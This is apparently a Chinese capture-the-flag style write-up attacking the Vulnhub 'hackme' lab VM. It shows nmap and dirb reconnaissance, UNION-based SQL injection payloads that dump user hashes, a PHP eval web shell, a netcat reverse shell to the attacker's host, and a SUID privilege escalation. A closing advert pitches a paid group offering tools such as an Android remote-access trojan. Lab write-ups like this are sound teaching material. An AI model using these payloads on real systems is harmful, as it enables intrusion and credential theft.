渗透Vulnhub-hackme靶机
本篇文章旨在为网络安全渗透测试靶机教学。通过阅读本文,读者将能够对渗透Vulnhub系列hackme靶机有一定的了解
一、信息收集阶段
靶机地址:https://download.vulnhub.com/hackme/hackme.ova
因为靶机为本地部署虚拟机网段,查看dhcp地址池设置。得到信息IP为:192.168.60.0/24
1、扫描网段,发现主机
nmap -sP 192.168.60.0/24
2、扫描主机详细信息
nmap -sT -sV -sC 192.168.60.178
#-sT 会尝试与目标主机的每个端口建立完整的 TCP 连接
#-sV 尝试确定每个打开端口上运行的服务的版本
#-sC 使用默认的脚本扫描(Script Scanning)可以帮助发现更多的信息,如漏洞、配置错误等
二、攻击阶段
1、web目录枚举
dirb http://192.168.60.178
http://192.168.60.178/login.php
http://192.168.60.178/uploads/
2、尝试注册用户
3、搜索信息
4、sql手工注入
(1)判断列数
oscp' or 1=1 order by 3 -- qwq
(2)联合查询
oscp' or 1=1 order by 3 -- qwq
(3)查询当前
oscp' union select database(),2,3 -- qwq
# webapphacking
(4)暴数据库
oscp' union select group_concat(schema_name),2,3 from information_schema.schemata -- qwq
# information_schema,mysql,performance_schema,sys,webapphacking
(5)暴当前数据库的表
oscp' union select group_concat(table_name),2,3 from information_schema.tables where table_schema=database() -- qwq
# books,users
(6)users表的列(字段)
oscp' union select group_concat(column_name),2,3 from information_schema.columns where table_schema=database() and table_name="users" -- qwq
# id,user,pasword,name,address
(7)暴表数据
oscp' union select group_concat(user,'-',pasword),2,3 from users -- qwq
# user1-5d41402abc4b2a76b9719d911017c592 MD5解密:hello
# user2-6269c4f71a55b24bad0f0267d9be5508 MD5解密:commando
# user3-0f359740bd1cda994f8b55330c86d845 MD5解密:p@ssw0rd
# test-05a671c66aefea124cc08b76ea6d30bb MD5解密:testtest
# superadmin-2386acb2cf356944177746fc92523983 MD5解密:Uncrackable
# test1-05a671c66aefea124cc08b76ea6d30bb MD5解密:testtest
# abc-e10adc3949ba59abbe56e057f20f883e MD5解密:123456
5、登录superadmin账号
通过sql注入获得superman账号 密码:Uncrackable
6、上传一句话木马
<?php @eval($_POST['cmd']);?>
7、蚁剑连接一句话
8、反弹shell
nc -lvvp 4444
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.60.128 4444 >/tmp/f
三、提权阶段
1、信息收集
cd /home/legacy
2、执行提权文件
.\touchmenot
内部帮会
可以加入一下我们的帮会,是真正的红队大佬创建的,里面会定时丢些网上没有的工具(比如安卓远控7.4,不过现在已经删除了,有时限,加入的记得看好时间),现在只要99就可以终身,后面人多了就会涨价了